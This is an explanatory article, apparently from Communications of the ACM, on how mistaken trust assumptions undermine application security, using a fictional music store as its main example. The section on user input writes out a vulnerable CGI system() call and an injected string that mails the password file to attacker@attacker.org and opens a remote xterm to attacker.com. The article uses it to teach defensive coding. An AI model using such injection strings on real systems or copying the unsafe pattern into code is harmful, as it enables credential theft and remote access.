Research and Advances
Computing Applications

Trust (and Mistrust) in Secure Applications

Exploring and considering trust assumptions during every stage of software development.
Posted
  1. Introduction
  2. The Origins of Erroneous Trust Assumptions
  3. Trust in an Evolving Infrastructure
  4. Trusting User Input
  5. Trusting the Client Application
  6. Trusting the Execution Environment
  7. Advice
  8. References
  9. Authors
  10. Figures

Trust and trustworthiness are the foundations of security. Homeowners trust lock manufacturers to create quality locks to protect their homes. Some locks are trustworthy; others are not. Businesses trust security guards to admit only authorized personnel into sensitive areas. Some security guards should be trusted; some should not. CGI programmers trust users to provide valid inputs to the data fields on Web pages. Although most users can be trusted, some cannot. The basis for these trust relationships and how they are formed can dramatically affect the underlying security of any system—be it home protection or online privacy.

Because these trust assumptions are often illusive, software development efforts seldom handle these assumptions correctly. Several common ways in which erroneous trust assumptions in software applications can wreak havoc on the security of those applications are explored here. We consider the common trust assumptions and why they are often wrong, how these trust assumptions can arise during an application’s development process, and how to minimize the number of problematic trust assumptions in an application.

A trust relationship is a relationship involving multiple entities (such as companies, people, or software components). Entities in a relationship trust each other to have or not have certain properties (the so-called trust assumptions). If the trusted entities satisfy these properties, then they are trustworthy. Unfortunately, because these properties are seldom explicitly defined, misguided trust relationships in software applications are not uncommon.

Software developers have trust relationships during every stage of software development. Before a software project is conceived, there are business and personal trust relationships that developers generally assume will not be abused. For example, many corporations trust that their employees will not attack the information systems of the company. Because of this trust, a company might have a software application talking to a database over the company’s network without the aid of encryption and authentication. Employees could easily abuse the lack of security to convince database applications to run phony updates. Companies usually trust their software developers and assume their developers will not leave back doors or other artifacts in their code that could potentially compromise the security of the system.

System architects must constantly deal with trust issues during an application’s design cycle. Proprietary design documents and other data are often communicated over channels that should not be trusted (such as the Internet); the developer must weigh his or her trust in the people who might have access to this data, along with the potential consequences of those people abusing that trust.


In most projects, dangerous trust assumptions come from two major areas: incomplete requirements and miscommunication between development groups.


Often, designers make trust decisions without realizing that trust is actually an issue. For example, it is common for a client application to establish an encrypted session with an application server using a hard-coded symmetric cryptographic key embedded in the client binary. In such a situation, many developers fail to realize they are implicitly trusting users (and potential attackers) not to reverse-engineer the software.

Once the implementation phase begins, developers may make similarly blind assumptions about the validity of input to or the environment of deployed code. For example, programmers will sometimes assume that the inputs to their program have certain formats and lengths. Unfortunately, however, when these assumptions are not satisfied, an attacker may be able to mount an attack known as a buffer overflow.

Many software developers either misunderstand trust or completely ignore trust issues. Too often developers look at trust in the small scope of the component they are writing—not in the system as a whole. For example, companies may assume since a critical component uses cryptography, that component is inherently secure. These companies ignore the fact that although a given component may be secure by itself, that component may have implicit trust relationships with other, potentially subvertible, components.

Ultimately, if developers overestimate or misjudge the trustworthiness of other components in the system, the deployment environment, or peering organizations, then the underlying security architecture may be inadequate.

Back to Top

The Origins of Erroneous Trust Assumptions

Erroneous trust assumptions can be made at any point in the software development process. However, in most projects, dangerous trust assumptions come from two major areas: incomplete requirements and miscommunication between development groups.

When a development team creates requirements, that team typically tends to concentrate on the functionality of the software and on requirements dictated from outside the software itself. “The program must implement a preexisting protocol” and “management wants us to use Oracle” are classic examples. Development teams historically ignore security requirements. Even if security requirements are discussed, the discussions are often very naïve in nature. Because most developers are not trained in general security theory, problem areas are seldom addressed properly. Encryption and passwords are wielded like swords that make software seemingly “secure.”

These measures are not enough. Without recognizing all the entities and their trust relationships in a software system during the requirements phase of a project, that project is doomed from the start. Modern software packages have many required interfaces, both public and private. A development team must understand who will use these interfaces and what they can be trusted to do (or not do). As little trust as possible should be placed in the hands of external components. Not trusting the end user, the underlying operating system, or the network, should be requirements. The software under development must be written to handle malicious activities by any and all entities.

Once the requirements phase is over, there is still danger for the development teams. As the length of software development projects shortens, inter-developer communication suffers. Dot-com companies turn out software at phenomenal rates. If these companies take “too long,” a competitor may beat them to market and destroy their potential market share. Unfortunately, as these development cycles shorten, conventional software development models fall apart. Development now occurs in an ad hoc fashion, with code reviews falling by the wayside and communication among developers breaking down.

This lack of communication causes developers to make assumptions about the implementation. Without a clear division of tasks, a development group may assume another group is handling the security of a component when in reality security is never codified. Because of poor communication, developers may not have precise knowledge about the environment in which their code will run. This may lull developers into a false sense of security. If developers believe a component will run in a trusted environment, they may not utilize proper secure coding practices.

Back to Top

Trust in an Evolving Infrastructure

The dynamic dot-com economy is driven by money and politics. Business partnerships are based primarily on what each player brings to the table, not on the underlying security architectures of each company’s software. Partnerships form and mergers are established without regard to how all the technical pieces fit together. Developers and administrators are left to put everything together, usually in a highly compressed time frame.

When these partnerships are created, new trust relationships are formed. The trust relationships resulting from the partnership may not have been accounted for in the original software design. As an example, consider the customer service systems of the partnering companies. While giving a newfound business partner unabated access to customer service software may seem like a safe thing to do, there may be unforeseen security implications. The initial software requirements may have assumed that only employees would have access and that network protections such as a firewall would prevent someone from outside the company accessing the application. But, by granting access to a partner company, this requirement has changed. Unless the software changes, the original company ends up trusting its partner’s employees just as it trusts its own. Such trust could result in security violations. Consider, for example, a scenario in which some customer service software is trusted by another, more sensitive system such as an accounting database. Even though the company has not explicitly given access to the accounting database, people outside the company can now browse customer billing information or other sensitive information.

Sometimes companies will discover these large gaping holes in their new trust model and try to patch the problems quickly and in an ad hoc manner. Unfortunately, patching doesn’t always work. If the new trust models fundamentally change the software system’s requirements, a completely new development effort may be necessary.

This example is more common than many would think. The face of business changes at a much faster rate than it did even just a few years ago. Evolving partnerships and relationships can change trust models on almost a monthly basis. This can overburden everyone involved, leading to complacency. For many companies, there is no hope of fixing the problem. Their systems must be redesigned from scratch.

Back to Top

Trusting User Input

Writing secure code is an incredibly difficult task. This should come as no surprise to most, as programming is an extraordinarily complex task in which many things can go wrong. Programmers are generally not expected to be security experts; while programmers are likely to understand basic risks and will often add encryption to their software, they frequently do not understand the subtle potentials for security risks that can be accidently introduced into code.

The most important example of this nature is the buffer overflow, which accounts for over 50% of reported software security vulnerabilities in the past few years [4]. This problem is widespread largely because it is extremely easy for even good programmers to accidentally introduce buffer overflow vulnerabilities into their code. For example, it is quite common for programmers to accidentally misuse standard library routines in ways that make them susceptible to buffer overflow attacks.

Buffer overflows are limited to languages without array bounds checking; C and C++ are particularly problematic. In these languages, a buffer overflow occurs when more data is placed into an array than the array was designed to hold. When this happens the extra data is still written into memory but in an unpredictable location. Buffer overflows are considered a reliability problem because when an overflow actually occurs, a program crash often results. Carefully crafted inputs can sometimes allow an attacker to change security-critical data or to run arbitrary code in place of the program expected to be running.

In addition to buffer overflows, there are other common input validation problems that have major security implications. For example, although CGI programs usually take inputs from a user through a forms interface, they can take additional input from the client side. Often, important data is stored in hidden HTML fields, such as in the following example:

  • <form action=http://www.list.org/ viega-cgi/send-mail.py method=post>
  •   <h3>Edit Message:</h3>
  •   <textarea name=contents cols=80 rows=10>
  •   </textarea>
  •   <input type=hidden name=to value=viega@list.org>
  •   <input type=submit value=Submit>
  •   </form>

This HTML form provides a text area for input and a submit button. However, it also has a “hidden” field, which passes an email address to the called CGI script, but does not show up in the browser display. That way, the HTML form could be modified to send mail to other users without requiring a different script. Tampering with this HTML page is certainly possible; anyone can copy the HTML code and modify the hidden parameter.

Developers must realize that hidden parameters can be modified maliciously and are therefore untrustworthy. For example, if the hidden field were directly passed to a shell to send mail, then an attacker could submit an email address with escape characters for the shell, along with an arbitrary command. That is, if the invoked CGI script runs on a Unix machine and contains the call:

  • system("/bin/mail " + address + " < tmpfile")

the attacker could send the following string:

  • attacker@attacker.org < /etc/passwrd; export DISPLAY=attacker.com:0;xterm& #".

After substitution, the machine would run the command:

  • system("/bin/mail attacker@attacker.org < /etc/passwrd; export DISPLAY=attacker.com:0;xterm& # < tmpfile").

This command would mail the attacker the password database on the remote server and then give the attacker an interactive session on the remote machine.

It is easy to use functions like “system” without understanding the security implications. In this case, a programmer would implicitly trust users without understanding the consequences. Unfortunately, however, the consequences of trusting users can be extremely dangerous. For example, in February 2000, Internet Security Systems released a study exposing hidden input vulnerabilities in 11 different commercial shopping cart applications [3].

The same sorts of modifications that can have an impact on hidden fields can be made to cookies that are stored in a user’s browser. It is easy to modify persistent cookies because they are stored on a user’s disk. Temporary cookies, although stored in a program’s memory, can also be changed by a skilled attacker.

A key problem is that developers often do not anticipate malicious misuse of their applications. For example, using a cookie to store a user identification token is common and allows a Web site to “remember” visitors between sessions. However, it rarely occurs to developers that a user might try to modify his or her cookies in order to log in as another user. Unfortunately, cookie modification can result in a serious attack. For example, at e-commerce sites, logging in as another user would often allow an attacker to spend money using someone else’s credit card. The point is that although developers often trust a client’s cookies, those cookies may be unworthy of such trust.

This kind of trust issue is common in all applications and is not limited to CGI or buffer overflow problems. For example, we have often seen scenarios in which a client contains embedded SQL code that it sends to a remote server for execution. In these cases, a malicious client could be written to send arbitrary SQL code. Another example is the common practice of using DNS addresses or IP addresses associated with a network connection as proof of identity. However, this kind of information can usually be faked.

Back to Top

Trusting the Client Application

In this section we will use a fictitious company, Bob’s Music Warehouse, as a vehicle to discuss how implicit trust relationships with a client application, if not satisfied, could result in the security goals of a system not being met.

Bob’s Music Warehouse provides a novel way of selling music over the Internet. Bob’s Music Warehouse consists of several components: a Web browser, a client application, a front-end server, a content database, and a credit card transaction server (see the figure). Although Bob’s Music Warehouse is imaginary, its architecture is similar to many real-world systems.

The Web browser runs on users’ computers. Users can access the front-end server and purchase music titles with the browser. The browser communicates with the front-end server by using cryptography.

The client application also runs on the users’ computers. Users use the client application to play their purchased titles. In order to prevent a user from making illegal copies of purchased music, the purchased titles remain encrypted on the users’ computers. Only the client application can decrypt and load the purchased titles. Furthermore, in order to prevent a user from giving his or her encrypted titles to a friend who also owns a copy of the client application, the purchased titles are cryptographically bound to the purchaser’s identity (see [1] for a discussion on how this can be done).

The front-end server provides the primary logic for Bob’s Music Warehouse. The front-end server acts as the gateway between the client applications, the content database, and the credit card transaction server. It uses cryptography to communicate with the various components.

The content databases contain the actual music titles for purchase. The content databases may be owned by Bob’s Music Warehouse or may be owned by a partnering organization. The credit card transaction server handles the credit card transactions for Bob’s Music Warehouse.

Since the client application is responsible for loading and decrypting the contents of a song purchased by the user, the client application is instrumental in enforcing the security requirements of Bob’s Music Warehouse. That is, the client application functions as a “window” into the encrypted title’s contents. Since only the client is supposed to be able to decrypt the purchased contents, a user should only be able to access purchased songs through the client application.

Now let us consider what could happen when a client application does not satisfy the Music Warehouse’s trust assumptions. First and foremost, Bob’s Music Warehouse trusts the client application to not only do what it is supposed to do (play the purchased titles), but to not do what it is not supposed to do. For example, Bob’s Music Warehouse assumes that the client application will not simply write the decrypted songs to the user’s hard drive. This is an obvious assumption, for if it were not true, a malicious user could simply distribute pirated copies of the decrypted songs to countless other users.

Unfortunately, trust assumptions seldom hold in real life. What may seem obvious when thinking about security may seem counterintuitive at implementation time. For example, the developers may decide it is necessary to store audio files in a temporary location while they are open in the client application because the client would otherwise take up too much memory for performance reasons. This policy violates the security requirement, but may go unnoticed since it seems like a natural thing to do. Developers are not likely to immediately see the security implications, since they expect the end user to have no direct interaction with the temporary file at all. However, an attacker could easily learn about the temporary files and copy them whenever they get written.

Another common assumption is that a legitimate external component will handle its data correctly. This is particularly important when different parties develop different components in a system. Consider the relationship between the front-end server and the third-party contents databases. The third-party music providers assume the front-end server will actually encrypt the songs before the songs are sent to the end user. Unfortunately, however, since the third-party content providers do not have any direct control over the Music Warehouse front-end server, the music providers have no guarantee their music will be encrypted.

Similarly, consider a situation in which Bob’s Music Warehouse and Alice’s Music Warehouse both produce compatible products. That is, Bob’s client application can work with Alice’s front-end server and vice versa. Both Alice and Bob must assume each other’s client application will not leak information about the contents of the purchased songs.

Ultimately, distributed systems rely on many different components. However, it is often impossible to ensure that all the different components are legitimate and the different components will correctly perform their desired operations. Consequently, it is very important to minimize (or eliminate) the trust assumptions between the various components in a multiparty system.

Back to Top

Trusting the Execution Environment

Many application developers make assumptions about the environment in which their application will execute. In particular, application providers often assume their code will execute in a non-hostile environment. Building off this assumption, many software developers embed secrets into their executable code. For example, Bob’s Music Warehouse application developers hard-coded the cryptographic key used to decrypt purchased songs into the client application itself. Since Bob’s Music Warehouse trusts the environment in which the client application will execute, Bob’s Music Warehouse assumes no attacker will be able to recover the secret key hidden in the client application.

The problem with this type of embedding procedure is that although a normal user would not be able to extract the cryptographic key from the client application, a skilled cracker would.

If the key is simply stored in the executable file, a cracker might scan the executable looking for portions of data that appear uncharacteristically random. A slightly more sophisticated attacker could use a debugger to extract the secret key from the client application. To do this, the attacker would run the client application in a debugger. The debugger would enable the attacker to monitor the exact operations the program performs. In this way, the attacker would be able to monitor the client application as it decrypts the purchased songs and, therefore, reconstruct the client application’s decryption algorithm and secret key.

Some application developers realize that a malicious user might be able run their applications in a hostile environment in order to mount one of the previous attacks. Consequently, many application developers attempt to obfuscate their code. Code obfuscation involves modifying the code in such a way that an attacker will not be able to understand the inner workings of the code [2]. Although code obfuscation can impede a cracker’s efforts to recover information from an executable, code obfuscation is in no way perfect—at some point the obfuscated code must transform into code understandable by the executing environment. If an attacker controls the application’s executing environment and can monitor the execution of the program, the attacker will be able to determine the secrets embedded in the obfuscated code.

There are other attacks one could perform against an application that trusts its executing environment. Consider, for example, the Bob’s Music Warehouse client application. The application plays purchased songs on users’ computers. Suppose an attacker monitors the communications between the client application and the computer’s sound system. If an attacker is able to do this, then he or she will be able to make illegal copies of the purchased titles.

At some point, an application must trust the environment in which it executes. However, in order to increase one’s confidence in the security of the application, the application should minimize the amount of trust it places in its execution environment.

Back to Top

Advice

Trust-related problems in applications arise because of assumptions (and lack of explicit requirements) during the applications’ design and implementation phases. Problems may also be a result of various implementation problems such as miscommunication between development groups or excessively rapid development. In order to create secure applications, trust relationships must be carefully and directly addressed.

During the design phase, all entities involved in a system must be identified. Once they are properly documented, the trust relationships between the entities must be formalized. These trust relationships will map directly into system requirements that will later be codified during implementation. Whenever the entities change, perhaps when companies form new partnerships, the trust relationships must be reexamined. If the new relationships cause a shift in trust, new requirements must be drafted. A decision must then be made as to whether the current system can be patched or whether the system should be completely rearchitected and reimplemented.

The code should be reviewed, either by hand or by automated tools, to ensure it is not placing too much trust in user input. While there is no method to guarantee that a program is immune to buffer overflow and other input-related attacks, a thorough review process can help eliminate problems resulting from malicious user input.

Although there is no complete solution to the problem of erroneous trust relationships, by understanding the potential problems of trust relationships, applications developers will be able to produce better, more secure software systems and applications.

Back to Top

Back to Top

Back to Top

Figures

UF1 Figure. Pictorial overview of Bob’s Music Warehouse architecture.

Back to top

    1. Adams C. and Zuccherato, R. A global PMI for electronic content distribution. In Seventh Annual Workshop on Selected Areas in Cryptography. Workshop Record, Aug. 2000. Springer-Verlag, to appear.

    2. Collberg, C., Thomborson, C. and Low, D. A taxonomy of obfuscating transformations. Technical Report 148, Department of Computer Science, University of Auckland, New Zealand, Jul. 1997; ftp.cs.auckland.ac.nz/out/techreports/.

    3. Internet Security Systems. Form tampering vulnerabilities in several Web-based shopping cart applications; xforce.iss.net/alerts/ advise42.php, Feb. 2000.

    4. Wagner, D., Foster, J.S., Brewer, E.A. and Aiken, A. A first step towards automated detection of buffer overrun vulnerabilities. In Network and Distributed Systems Security Symposium, Feb. 2000.

Join the Discussion (0)

Become a Member or Sign In to Post a Comment

The Latest from CACM

Shape the Future of Computing

ACM encourages its members to take a direct hand in shaping the future of the association. There are more ways than ever to get involved.

Get Involved

Communications of the ACM (CACM) is now a fully Open Access publication.

By opening CACM to the world, we hope to increase engagement among the broader computer science community and encourage non-members to discover the rich resources ACM has to offer.

Learn More